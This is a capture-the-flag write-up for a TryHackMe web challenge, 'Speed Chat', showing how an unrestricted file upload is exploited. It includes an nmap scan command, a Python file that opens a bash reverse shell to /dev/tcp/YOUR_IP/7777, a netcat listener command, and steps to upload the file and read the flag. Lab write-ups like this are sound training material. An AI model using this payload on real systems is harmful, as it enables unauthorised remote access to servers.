Speed Chat

1 minute read

🌐 Love at First Breach 2026 - Speed Chat

Category Author
🌐 Web TryHackMe

Challenge Prompt

My Dearest Hacker,

Days before Valentine’s Day, TryHeartMe rushed out a new messaging platform called “Speed Chatter”, promising instant connections and private conversations. But in the race to beat the holiday deadline, security took a back seat. Rumours are circulating that “Speed Chatter” was pushed to production without proper testing.

As a security researcher, it’s your task to break into “Speed Chatter”, uncover flaws, and expose TryHeartMe’s negligence before the damage becomes irreversible.

You can find the web application here: http://MACHINE_IP:5000

Problem Type

  • Unrestricted File Upload

Solve

When we visit the website, we get a chat window and profile window. I started off with sending a chat to see if there would be a response, but there wasn’t. 2026-02-14_21-34-20

It appears we can upload a file. Let’s run a quick nmap scan to see what language the site is running. I used nmap -p 5000 -T4 -A SITE_IP: 2026-02-14_21-54-15

Looks like this is running in Python, so let’s try a Python reverse shell. We will do a really simple one that calls a bash reverse shell from Payloads All The Things:

1
2
import os
os.system("bash -c 'bash -i >& /dev/tcp/YOUR_IP/7777 0>&1'")

Save this file as exploit.py.

Then you can start a netcat listener on your machine using nc -nvlp 7777 in the terminal.

On the website, click Choose File and pick your exploit.py file. Then click Upload. When you return to your termial you should have access.
2026-02-14_22-04-27

Then you can run ls -la

There you will see the flag.txt file which you can cat out to the screen: 2026-02-14_22-05-35